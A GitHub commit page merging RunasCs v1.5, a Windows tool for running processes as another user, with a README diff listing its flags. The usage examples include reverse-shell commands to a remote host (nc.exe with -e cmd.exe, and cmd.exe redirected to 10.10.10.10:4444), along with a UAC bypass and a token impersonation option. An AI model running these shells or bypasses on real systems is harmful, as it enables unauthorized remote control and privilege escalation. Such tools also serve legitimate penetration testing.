Skip to content

Commit

Permalink
Merge pull request #5 from antonioCoco/dev
Browse files Browse the repository at this point in the history
RunasCs version 1.5
  • Loading branch information
antonioCoco authored May 20, 2023
2 parents fa68553 + b0f57aa commit a1e47b5
Show file tree
Hide file tree
Showing 3 changed files with 771 additions and 583 deletions.
126 changes: 76 additions & 50 deletions Invoke-RunasCs.ps1

Large diffs are not rendered by default.

106 changes: 54 additions & 52 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,7 @@ This tool is an improved and open version of windows builtin *runas.exe* that so
* Uses more reliable create process functions like ``CreateProcessAsUser()`` and ``CreateProcessWithTokenW()`` if the calling process holds the required privileges (automatic detection)
* Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no *UAC* limitations)
* Allows to bypass UAC when an administrator password is known (flag --bypass-uac)
* Allows to create a process with the main thread impersonating the requested user (flag --remote-impersonation)
* Allows redirecting *stdin*, *stdout* and *stderr* to a remote host
* It's Open Source :)

Expand All @@ -34,26 +35,26 @@ Based on the process caller token permissions, it will use one of the create pro
----

```console
RunasCs v1.4 - @splinter_code
RunasCs v1.5 - @splinter_code

Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--create-profile] [--bypass-uac]
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]

Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and crateProcess functions to be used, depending
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.

Positional arguments:
username username of the user
password password of the user
cmd command supported by cmd.exe if process_timeout>0
commandline for the process if process_timeout=0
cmd commandline for the process

Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
Expand All @@ -63,79 +64,80 @@ Optional arguments:
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the spawned process.
Default: "8" - NetworkCleartext
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process timeout to 0.
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and cmd.exe
won't be used to spawn the process.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-p, --create-profile
if this flag is specified RunasCs will force the
creation of the user profile on the machine.
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
NOTE: this will leave some forensics traces
behind creating the user profile directory.
Compatible only with -f flags:
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-b, --bypass-uac
if this flag is specified RunasCs will try a UAC
bypass to spawn a process without token limitation
(not filtered).
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.

Examples:
Run a command as a specific local user
RunasCs.exe user1 password1 whoami
Run a command as a specific domain user and interactive logon type (2)
RunasCs.exe user1 password1 whoami -d domain -l 2
Run a background/async process as a specific local user,
RunasCs.exe user1 password1 "%COMSPEC% powershell -enc..." -t 0
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.24:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 whoami -d domain -l 9
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "whoami /priv" --bypass-uac
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation
```

The two processes (calling and called) will communicate through one *pipe* (both for *stdout* and *stderr*).
The default logon type is 8 (*NetworkCleartext*).

**NetworkCleartext** logon type is the one with widest permissions as it doesn't get filtered by UAC in local tokens and still allows
authentications over the Network as it stores credentials in the authentication package.
The default logon type is 2 (*Interactive*).

If you set *Interactive* (2) logon type you will face some *UAC* restriction problems.
By default, the *Interactive* (2) logon type is restricted by *UAC* and the generated token from these authentications are filtered.
You can make interactive logon without any restrictions by setting the following regkey to 0 and restart the server:

```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
```

Otherwise, you can try the flag **--bypass-uac** for an attempt in bypassing the token filtered limitation.
Otherwise, you can try the flag **--bypass-uac** for an attempt in bypassing the token filtering limitation.

By default, the calling process (*RunasCs*) will wait until the end of the execution of the spawned process and will use
``cmd.exe`` to manage *stdout* and *stderr*. If you need to spawn a background or async process, i.e. spawning a reverse shell,
you need to set the parameter ``-t timeout`` to ``0``. In this case the process will be spawned without using ``cmd.exe``
and *RunasCs* won't wait for the end of the execution.
**NetworkCleartext (8)** logon type is the one with the widest permissions as it doesn't get filtered by UAC in local tokens and still allows
authentications over the Network as it stores credentials in the authentication package. If you holds enough privileges, try to always specify this logon type through the flag --logon-type 8.

By default, the calling process (*RunasCs*) will wait until the end of the execution of the spawned process.
If you need to spawn a background or async process, i.e. spawning a reverse shell, you need to set the parameter ``-t timeout`` to ``0``. In this case *RunasCs* won't wait for the end of the newly spawned process execution.

### References

----

* https://decoder.cloud/2018/01/13/potato-and-tokens/
* https://github.com/dahall/Vanara
* https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85)
* https://support.microsoft.com/en-us/help/190351/how-to-spawn-console-processes-with-redirected-standard-handles
* https://support.microsoft.com/en-us/help/327618/security-services-and-the-interactive-desktop-in-windows
* https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/

* [Potatoes and tokens](https://decoder.cloud/2018/01/13/potato-and-tokens/)
* [Starting an Interactive Client Process in C++](https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85))
* [Creating a Child Process with Redirected Input and Output](https://learn.microsoft.com/en-us/windows/win32/procthread/creating-a-child-process-with-redirected-input-and-output)
* [Interactive Services](https://learn.microsoft.com/en-us/windows/win32/services/interactive-services)
* [What is up with "The application failed to initialize properly (0xc0000142)" error?](https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/)
* [Getting an Interactive Service Account Shell](https://www.tiraniddo.dev/2020/02/getting-interactive-service-account.html)
* [Reading Your Way Around UAC (Part 1)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-1.html)
* [Reading Your Way Around UAC (Part 2)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html)
* [Reading Your Way Around UAC (Part 3)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-3.html)
* [Vanara - A set of .NET libraries for Windows implementing PInvoke calls to many native Windows APIs with supporting wrappers](https://github.com/dahall/Vanara)

### Credits

Expand Down
Loading

0 comments on commit a1e47b5

Please sign in to comment.